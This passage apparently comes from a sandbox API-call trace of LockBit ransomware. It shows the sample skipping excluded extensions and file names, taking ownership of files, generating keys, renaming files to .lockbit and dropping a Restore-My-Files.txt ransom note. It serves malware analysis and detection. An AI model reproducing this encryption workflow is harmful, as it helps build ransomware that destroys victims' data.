(pszPath="TitleButtonSubpicture.png") returned=".png" [0082.919] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.919] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.919] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.920] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.920] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.920] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.920] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.920] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.920] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.920] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.920] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.920] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.921] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.921] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.921] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.921] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.921] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.921] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.921] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TitleButtonSubpicture.png") returned -1 [0082.921] lstrcmpiW (lpString1="ntldr", lpString2="TitleButtonSubpicture.png") returned -1 [0082.921] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TitleButtonSubpicture.png") returned -1 [0082.921] lstrcmpiW (lpString1="bootsect.bak", lpString2="TitleButtonSubpicture.png") returned -1 [0082.921] lstrcmpiW (lpString1="autorun.inf", lpString2="TitleButtonSubpicture.png") returned -1 [0082.921] lstrcmpiW (lpString1="thumbs.db", lpString2="TitleButtonSubpicture.png") returned -1 [0082.921] lstrcmpiW (lpString1="iconcache.db", lpString2="TitleButtonSubpicture.png") returned -1 [0082.921] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.921] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned=".png" [0082.921] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.921] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.921] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.921] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.921] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.921] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.921] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.921] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.921] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.922] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.922] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.922] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.922] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.922] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.922] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.922] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.922] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.922] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.922] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.922] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.922] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.922] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.922] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.922] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.922] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.922] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.922] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.922] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.922] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png.lockbit") returned 90 [0082.922] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.923] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.923] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.923] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.924] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.924] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.924] RtlFreeAnsiString (AnsiString="\\") [0082.924] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0082.924] malloc (_Size=0x200) returned 0x77d800 [0082.924] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.924] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.924] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.924] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.925] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.925] CloseHandle (hObject=0x3b8) returned 1 [0082.925] free (_Block=0x77d800) [0082.925] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0082.925] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.925] malloc (_Size=0x40068) returned 0x3db00b8 [0082.927] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=132) returned 1 [0082.927] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.927] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0082.927] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.928] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0082.928] ReadFile (in: hFile=0x3b8, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0082.929] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.929] malloc (_Size=0xca) returned 0x77d800 [0082.929] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xca, FileInformationClass=0xa) returned 0x0 [0082.929] free (_Block=0x77d800) [0082.929] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.929] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.930] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.930] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703e5e14, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x703e5e14, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ded3ea1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1a9204, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_Page.wmv", cAlternateFileName="")) returned 1 [0082.930] lstrcmpiW (lpString1=".", lpString2="Title_Page.wmv") returned -1 [0082.930] lstrcmpiW (lpString1="..", lpString2="Title_Page.wmv") returned -1 [0082.930] PathFindExtensionW (pszPath="Title_Page.wmv") returned=".wmv" [0082.930] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0082.930] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0082.931] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0082.931] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Title_Page.wmv") returned -1 [0082.932] lstrcmpiW (lpString1="ntldr", lpString2="Title_Page.wmv") returned -1 [0082.932] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Title_Page.wmv") returned -1 [0082.932] lstrcmpiW (lpString1="bootsect.bak", lpString2="Title_Page.wmv") returned -1 [0082.932] lstrcmpiW (lpString1="autorun.inf", lpString2="Title_Page.wmv") returned -1 [0082.932] lstrcmpiW (lpString1="thumbs.db", lpString2="Title_Page.wmv") returned -1 [0082.932] lstrcmpiW (lpString1="iconcache.db", lpString2="Title_Page.wmv") returned -1 [0082.932] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.932] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned=".wmv" [0082.932] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0082.932] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0082.932] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0082.933] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0082.934] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0082.934] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.lockbit") returned 79 [0082.934] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.934] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.934] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.934] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.935] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.935] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.935] RtlFreeAnsiString (AnsiString="\\") [0082.935] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0082.935] malloc (_Size=0x200) returned 0x77d800 [0082.935] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.935] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.935] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.935] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.936] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.936] CloseHandle (hObject=0x3a0) returned 1 [0082.936] free (_Block=0x77d800) [0082.937] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0082.937] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.937] malloc (_Size=0x40068) returned 0x3df0128 [0082.938] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3df0140 | out: lpFileSize=0x3df0140*=1741316) returned 1 [0082.938] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.939] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3015c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3015c) returned 0x0 [0082.939] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.939] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3016c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3016c) returned 0x0 [0082.939] ReadFile (in: hFile=0x3a0, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 0x0 [0082.961] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.961] malloc (_Size=0xb4) returned 0x77d800 [0082.961] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0082.961] free (_Block=0x77d800) [0082.961] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.962] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.962] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.962] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7047e388, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7047e388, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e050c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1d0304, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_Page_PAL.wmv", cAlternateFileName="")) returned 1 [0082.962] lstrcmpiW (lpString1=".", lpString2="Title_Page_PAL.wmv") returned -1 [0082.962] lstrcmpiW (lpString1="..", lpString2="Title_Page_PAL.wmv") returned -1 [0082.962] PathFindExtensionW (pszPath="Title_Page_PAL.wmv") returned=".wmv" [0082.962] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0082.962] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0082.962] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0082.962] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0082.962] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0082.962] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0082.962] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0082.962] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0082.962] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0082.962] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0082.963] 